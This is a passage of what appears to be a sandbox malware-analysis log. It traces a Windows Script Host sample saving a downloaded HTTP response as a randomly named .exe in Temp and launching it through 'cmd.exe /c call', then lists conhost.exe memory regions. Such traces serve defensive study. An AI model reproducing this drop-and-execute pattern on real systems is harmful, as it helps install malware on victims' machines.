[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xc4685bd4d8*="responseBody", cNames=0x1, lcid=0x7ffb00000409, rgDispId=0xc4685bd2bc | out: rgDispId=0xc4685bd2bc*=11) returned 0x0 [0024.764] IUnknown:AddRef (This=0xc46aa957b0) returned 0x2 [0024.765] IUnknown:QueryInterface (in: This=0xc46aa957b0, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd020 | out: ppvObject=0xc4685bd020*=0x0) returned 0x80004002 [0024.765] IDispatch:Invoke (in: This=0xc46aa957b0, dispIdMember=11, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xc4685bd000*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0xc4689f9c28, pExcepInfo=0xc4685bd040, puArgErr=0xc4685bcfe0 | out: pDispParams=0xc4685bd000*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0xc4689f9c28*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46b470090*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0xc46b4700b0*, rgsabound=((cElements=0x26f2f, lLbound=0))), varVal2=0x0), pExcepInfo=0xc4685bd040*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bcfe0*=0x685bd0a0) returned 0x0 [0024.767] IUnknown:Release (This=0xc46aa957b0) returned 0x1 [0024.767] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd320 | out: ppvObject=0xc4685bd320*=0x0) returned 0x80004002 [0024.767] IDispatch:GetIDsOfNames (in: This=0xc468840f70, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xc4685bd500*="Write", cNames=0x1, lcid=0xc400000409, rgDispId=0xc4685bd2c0 | out: rgDispId=0xc4685bd2c0*=13) returned 0x0 [0024.767] IUnknown:AddRef (This=0xc468840f70) returned 0x2 [0024.767] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd020 | out: ppvObject=0xc4685bd020*=0x0) returned 0x80004002 [0024.767] IDispatch:Invoke (in: This=0xc468840f70, dispIdMember=13, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xc4685bd000*(rgvarg=([0]=0xc4685bd090*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46b470090*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0xc46b4700b0*, rgsabound=((cElements=0x26f2f, lLbound=0))), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bd040, puArgErr=0xc4685bcfe0 | out: pDispParams=0xc4685bd000*(rgvarg=([0]=0xc4685bd090*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46b470090*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0xc46b4700b0*, rgsabound=((cElements=0x26f2f, lLbound=0))), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bd040*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bcfe0*=0x685bd090) returned 0x0 [0024.771] IUnknown:Release (This=0xc468840f70) returned 0x1 [0024.772] ISystemDebugEventFire:IsActive (This=0xc4687edc20) returned 0x1 [0024.772] ISystemDebugEventFire:IsActive (This=0xc4687edc20) returned 0x1 [0024.773] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd320 | out: ppvObject=0xc4685bd320*=0x0) returned 0x80004002 [0024.773] IDispatch:GetIDsOfNames (in: This=0xc468840f70, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xc4685bd500*="Savetofile", cNames=0x1, lcid=0xc400000409, rgDispId=0xc4685bd2c0 | out: rgDispId=0xc4685bd2c0*=17) returned 0x0 [0024.773] IUnknown:AddRef (This=0xc468840f70) returned 0x2 [0024.773] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd020 | out: ppvObject=0xc4685bd020*=0x0) returned 0x80004002 [0024.773] IDispatch:Invoke (in: This=0xc468840f70, dispIdMember=17, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xc4685bd000*(rgvarg=([0]=0xc4689f9c70*(varType=0x2, wReserved1=0x685b, wReserved2=0xc4, wReserved3=0x0, varVal1=0xc4689f0002, varVal2=0xc4689fbe00), [1]=0xc4689f9c88*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc4689fa308*(varType=0x8, wReserved1=0x685b, wReserved2=0xc4, wReserved3=0x0, varVal1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe", varVal2=0x700000000), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bd040, puArgErr=0xc4685bcfe0 | out: pDispParams=0xc4685bd000*(rgvarg=([0]=0xc4689f9c70*(varType=0x2, wReserved1=0x685b, wReserved2=0xc4, wReserved3=0x0, varVal1=0xc4689f0002, varVal2=0xc4689fbe00), [1]=0xc4689f9c88*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc4689fa308*(varType=0x8, wReserved1=0x685b, wReserved2=0xc4, wReserved3=0x0, varVal1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe", varVal2=0x700000000), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bd040*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bcfe0*=0x685bd090) returned 0x0 [0024.773] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb239e51a8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bc1d0 | out: ppvObject=0xc4685bc1d0*=0xc46a84ada0) returned 0x0 [0024.773] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb239e51a8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bc228 | out: ppvObject=0xc4685bc228*=0xc46a84ada0) returned 0x0 [0024.773] IUnknown:Release (This=0xc46a84ada0) returned 0x2 [0024.780] IUnknown:Release (This=0xc46a84ada0) returned 0x1 [0024.780] IUnknown:Release (This=0xc468840f70) returned 0x1 [0024.780] ISystemDebugEventFire:IsActive (This=0xc4687edc20) returned 0x1 [0024.781] LoadRegTypeLib (in: rguid=0x7ffb253c24b8*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0xc4685bd7a8*=0x20 | out: pptlib=0xc4685bd7a8*=0xc468889c40) returned 0x0 [0024.784] ITypeLib:GetTypeInfoOfGuid (in: This=0xc468889c40, GUID=0x7ffb253c2498*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0xc4685bd748 | out: ppTInfo=0xc4685bd748*=0xc4688bd628) returned 0x0 [0024.784] ITypeInfo:GetRefTypeOfImplType (in: This=0xc4688bd628, index=0xffffffff, pRefType=0xc4685bd740 | out: pRefType=0xc4685bd740*=0xfffffffe) returned 0x0 [0024.784] ITypeInfo:GetRefTypeInfo (in: This=0xc4688bd628, hreftype=0xfffffffe, ppTInfo=0x7ffb253cc1e8 | out: ppTInfo=0x7ffb253cc1e8*=0xc4688bd680) returned 0x0 [0024.784] IUnknown:Release (This=0xc4688bd628) returned 0x1 [0024.784] IUnknown:Release (This=0xc468889c40) returned 0x1 [0024.784] IUnknown:AddRef (This=0xc4688bd680) returned 0x2 [0024.784] ITypeInfo:LocalGetIDsOfNames (This=0xc4688bd680) returned 0x0 [0024.784] IUnknown:Release (This=0xc4688bd680) returned 0x1 [0024.784] IUnknown:AddRef (This=0xc4688bd680) returned 0x2 [0024.784] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0024.784] ITypeInfo:LocalInvoke (This=0xc4688bd680) returned 0x0 [0024.784] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c call \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", lpDst=0xc4685bbfb0, nSize=0x400 | out: lpDst="cmd.exe /c call \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"") returned 0x45 [0024.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x7ffb3aa50000 [0024.785] GetProcAddress (hModule=0x7ffb3aa50000, lpProcName="ShellExecuteExW") returned 0x7ffb3ab32460 [0024.785] ShellExecuteExW (in: pExecInfo=0xc4685bc790*(cbSize=0x70, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c call \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0xc4685bc790*(cbSize=0x70, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c call \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0024.900] IUnknown:Release (This=0xc4688bd680) returned 0x1 [0024.901] ISystemDebugEventFire:IsActive (This=0xc4687edc20) returned 0x1 [0024.901] GetCurrentThreadId () returned 0xe9c [0024.901] IUnknown:Release (This=0xc46a84aa00) returned 0x0 [0024.904] IUnknown:Release (This=0xc46a84ada0) returned 0x0 [0024.904] IUnknown:Release (This=0xc4688bd680) returned 0x0 [0024.905] ISystemDebugEventFire:EndSession (This=0xc4687edc20) returned 0x0 [0024.905] IUnknown:Release (This=0xc4687edc20) returned 0x1 [0024.905] GetUserDefaultLCID () returned 0x409 [0024.905] GetACP () returned 0x4e4 [0024.906] IUnknown:Release (This=0xc4687edc20) returned 0x0 [0024.906] SendMessageA (hWnd=0x5016e, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0024.906] SendMessageA (hWnd=0x5016e, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0024.907] PostMessageA (hWnd=0x5016e, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0024.908] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0xc4685bf4a0*=0x12c, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff) returned 0x0 [0024.908] CloseHandle (hObject=0x12c) returned 1 [0024.908] IUnknown:Release (This=0xc4687dad90) returned 0x0 [0024.908] IUnknown:Release (This=0xc4687dae40) returned 0x0 [0024.908] IUnknown:Release (This=0xc4687daef0) returned 0x0 [0024.908] IUnknown:Release (This=0xc4687dace0) returned 0x0 [0024.909] GetProcAddress (hModule=0x7ffb30da0000, lpProcName="AmsiUninitialize") returned 0x7ffb30da2490 [0024.909] AmsiUninitialize () returned 0x1 [0024.917] FreeLibrary (hLibModule=0x7ffb30da0000) returned 1 [0024.918] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0xc4685bf4a0 | out: lplpMessageFilter=0xc4685bf4a0*=0xc4689f59d0) returned 0x0 [0024.918] FreeLibrary (hLibModule=0x7ffb2bea0000) returned 1 [0024.919] CoUninitialize () [0024.919] DllCanUnloadNow () returned 0x0 [0024.919] DllCanUnloadNow () returned 0x0 [0024.919] DllCanUnloadNow () returned 0x0 [0025.160] ExitProcess (uExitCode=0x0) Thread: id = 6 os_tid = 0xed4 Thread: id = 7 os_tid = 0xee4 [0018.776] GetClassInfoA (in: hInstance=0x7ff770f20000, lpClassName="WSH-Timer", lpWndClass=0xc46a55f810 | out: lpWndClass=0xc46a55f810) returned 0 [0018.777] RegisterClassA (lpWndClass=0xc46a55f810) returned 0xc173 [0018.777] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff770f20000, lpParam=0xc4689f5bf0) returned 0x5016e [0018.777] GetWindowLongPtrA (hWnd=0x5016e, nIndex=-21) returned 0x0 [0018.777] NtdllDefWindowProc_A (hWnd=0x5016e, Msg=0x24, wParam=0x0, lParam=0xc46a55f1b0) returned 0x0 [0018.777] GetWindowLongPtrA (hWnd=0x5016e, nIndex=-21) returned 0x0 [0018.778] SetWindowLongPtrA (hWnd=0x5016e, nIndex=-21, dwNewLong=0xc4689f5bf0) returned 0x0 [0018.778] NtdllDefWindowProc_A (hWnd=0x5016e, Msg=0x81, wParam=0x0, lParam=0xc46a55f170) returned 0x1 [0018.780] GetWindowLongPtrA (hWnd=0x5016e, nIndex=-21) returned 0xc4689f5bf0 [0018.780] NtdllDefWindowProc_A (hWnd=0x5016e, Msg=0x83, wParam=0x0, lParam=0xc46a55f1d0) returned 0x0 [0018.783] GetWindowLongPtrA (hWnd=0x5016e, nIndex=-21) returned 0xc4689f5bf0 [0018.783] NtdllDefWindowProc_A (hWnd=0x5016e, Msg=0x1, wParam=0x0, lParam=0xc46a55f170) returned 0x0 [0018.784] SetEvent (hEvent=0x128) returned 1 [0018.913] GetMessageA (in: lpMsg=0xc46a55f7e0, hWnd=0x5016e, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xc46a55f7e0) returned 1 [0018.913] DispatchMessageA (lpMsg=0xc46a55f7e0) returned 0x0 [0018.913] GetWindowLongPtrA (hWnd=0x5016e, nIndex=-21) returned 0xc4689f5bf0 [0018.913] NtdllDefWindowProc_A (hWnd=0x5016e, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0018.913] GetMessageA (in: lpMsg=0xc46a55f7e0, hWnd=0x5016e, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xc46a55f7e0) returned 0 [0024.906] GetWindowLongPtrA (hWnd=0x5016e, nIndex=-21) returned 0xc4689f5bf0 [0024.907] GetWindowLongPtrA (hWnd=0x5016e, nIndex=-21) returned 0xc4689f5bf0 Thread: id = 8 os_tid = 0xee8 Thread: id = 9 os_tid = 0xeec Thread: id = 10 os_tid = 0xef0 Thread: id = 11 os_tid = 0xef4 Thread: id = 12 os_tid = 0xef8 Thread: id = 13 os_tid = 0xf24 Thread: id = 15 os_tid = 0xf88 Process: id = "2" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x710bc000" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe98" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 156 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 157 start_va = 0xc9e48b0000 end_va = 0xc9e48cffff entry_point = 0x0 region_type = private name = "private_0x000000c9e48b0000" filename = "" Region: id = 158 start_va = 0xc9e48d0000 end_va = 0xc9e48e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e48d0000" filename = "" Region: id = 159 start_va = 0xc9e48f0000 end_va = 0xc9e492ffff entry_point = 0x0 region_type = private name = "private_0x000000c9e48f0000" filename = "" Region: id = 160 start_va = 0x7df5fff00000 end_va = 0x7ff5ffefffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff00000" filename = "" Region: id = 161 start_va = 0x7ff79d860000 end_va = 0x7ff79d882fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff79d860000" filename = "" Region: id = 162 start_va = 0x7ff79d887000 end_va = 0x7ff79d887fff entry_point = 0x0 region_type = private name = "private_0x00007ff79d887000" filename = "" Region: id = 163 start_va = 0x7ff79d88e000 end_va = 0x7ff79d88ffff entry_point = 0x0 region_type = private name = "private_0x00007ff79d88e000" filename = "" Region: id = 164 start_va = 0x7ff79e220000 end_va = 0x7ff79e230fff entry_point = 0x7ff79e220000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 165 start_va = 0x7ffb3d310000 end_va = 0x7ffb3d4d1fff entry_point = 0x7ffb3d310000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 166 start_va = 0xc9e4990000 end_va = 0xc9e4a8ffff entry_point = 0x0 region_type = private name = "private_0x000000c9e4990000" filename = "" Region: id = 167 start_va = 0x7ffb3a800000 end_va = 0x7ffb3a9dcfff entry_point = 0x7ffb3a800000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 168 start_va = 0x7ffb3d260000 end_va = 0x7ffb3d30cfff entry_point = 0x7ffb3d260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 169 start_va = 0xc9e48b0000 end_va = 0xc9e48bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e48b0000" filename = "" Region: id = 170 start_va = 0xc9e4930000 end_va = 0xc9e496ffff entry_point = 0x0 region_type = private name = "private_0x000000c9e4930000" filename = "" Region: id = 171 start_va = 0xc9e4a90000 end_va = 0xc9e4b4dfff entry_point = 0xc9e4a90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 172 start_va = 0x7ff79d760000 end_va = 0x7ff79d85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff79d760000" filename = "" Region: id = 173 start_va = 0x7ff79d88c000 end_va = 0x7ff79d88dfff entry_point = 0x0 region_type = private name = "private_0x00007ff79d88c000" filename = "" Region: id = 174 start_va = 0x7ffb3cf10000 end_va = 0x7ffb3cfacfff entry_point = 0x7ffb3cf10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 175 start_va = 0xc9e48c0000 end_va = 0xc9e48c6fff entry_point = 0x0 region_type = private name = "private_0x000000c9e48c0000" filename = "" Region: id = 176 start_va = 0xc9e4970000 end_va = 0xc9e4970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e4970000" filename = "" Region: id = 177 start_va = 0xc9e4980000 end_va = 0xc9e4986fff entry_point = 0x0 region_type = private name = "private_0x000000c9e4980000" filename = "" Region: id = 178 start_va = 0xc9e4c90000 end_va = 0xc9e4c9ffff entry_point = 0x0 region_type = private name = "private_0x000000c9e4c90000" filename = "" Region: id = 179 start_va = 0x7ffb25140000 end_va = 0x7ffb25192fff entry_point = 0x7ffb25140000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 180 start_va = 0x7ffb36950000 end_va = 0x7ffb36ad2fff entry_point = 0x7ffb36950000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 181 start_va = 0x7ffb3bf80000 end_va = 0x7ffb3c0a5fff entry_point = 0x7ffb3bf80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 182 start_va = 0x7ffb3c290000 end_va = 0x7ffb3c2c5fff entry_point = 0x7ffb3c290000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 183 start_va = 0x7ffb3c3e0000 end_va = 0x7ffb3c564fff entry_point = 0x7ffb3c3e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 184 start_va = 0x7ffb3c650000 end_va = 0x7ffb3c79dfff entry_point = 0x7ffb3c650000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 185 start_va = 0x7ffb3c950000 end_va = 0x7ffb3c9aafff entry_point = 0x7ffb3c950000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 186 start_va = 0x7ffb3c9b0000 end_va = 0x7ffb3ca6dfff entry_point = 0x7ffb3c9b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 187 start_va = 0x7ffb3cb20000 end_va = 0x7ffb3cc60fff entry_point = 0x7ffb3cb20000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 188 start_va = 0x7ffb3cc70000 end_va = 0x7ffb3ceebfff entry_point = 0x7ffb3cc70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 189 start_va = 0x7ffb3d020000 end_va = 0x7ffb3d17bfff entry_point = 0x7ffb3d020000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 190 start_va = 0xc9e4b50000 end_va = 0xc9e4b50fff entry_point = 0x0 region_type = private name = "private_0x000000c9e4b50000" filename = "" Region: id = 191 start_va = 0xc9e4b60000 end_va = 0xc9e4b60fff entry_point = 0x0 region_type = private name = "private_0x000000c9e4b60000" filename = "" Region: id = 192 start_va = 0xc9e4b70000 end_va = 0xc9e4baffff entry_point = 0x0 region_type = private name = "private_0x000000c9e4b70000" filename = "" Region: id = 193 start_va = 0xc9e4ca0000 end_va = 0xc9e4e27fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e4ca0000" filename = "" Region: id = 194 start_va = 0xc9e4e30000 end_va = 0xc9e4fb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e4e30000" filename = "" Region: id = 195 start_va = 0xc9e4fc0000 end_va = 0xc9e63bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e4fc0000" filename = "" Region: id = 196 start_va = 0xc9e6520000 end_va = 0xc9e652ffff entry_point = 0x0 region_type = private name = "private_0x000000c9e6520000" filename = "" Region: id = 197 start_va = 0x7ff79d88a000 end_va = 0x7ff79d88bfff entry_point = 0x0 region_type = private name = "private_0x00007ff79d88a000" filename = "" Region: id = 198 start_va = 0x7ffb39d60000 end_va = 0x7ffb39d6efff entry_point = 0x7ffb39d60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 199 start_va = 0x7ffb39d70000 end_va = 0x7ffb39d82fff entry_point = 0x7ffb39d70000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 200 start_va = 0x7ffb39d90000 end_va = 0x7ffb39dd9fff entry_point = 0x7ffb39d90000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 201 start_va = 0x7ffb39de0000 end_va = 0x7ffb3a407fff entry_point = 0x7ffb39de0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 202 start_va = 0x7ffb3a570000 end_va = 0x7ffb3a622fff entry_point = 0x7ffb3a570000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 203 start_va = 0x7ffb3a9f0000 end_va = 0x7ffb3aa40fff entry_point = 0x7ffb3a9f0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 204 start_va = 0x7ffb3aa50000 end_va = 0x7ffb3bf74fff entry_point = 0x7ffb3aa50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 205 start_va = 0x7ffb3c2d0000 end_va = 0x7ffb3c375fff entry_point = 0x7ffb3c2d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 206 start_va = 0x7ffb38610000 end_va = 0x7ffb386a5fff entry_point = 0x7ffb38610000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 207 start_va = 0xc9e48f0000 end_va = 0xc9e492ffff entry_point = 0x0 region_type = private name = "private_0x000000c9e48f0000" filename = "" Region: id = 208 start_va = 0xc9e4bb0000 end_va = 0xc9e4c67fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c9e4bb0000" filename = "" Region: id = 209 start_va = 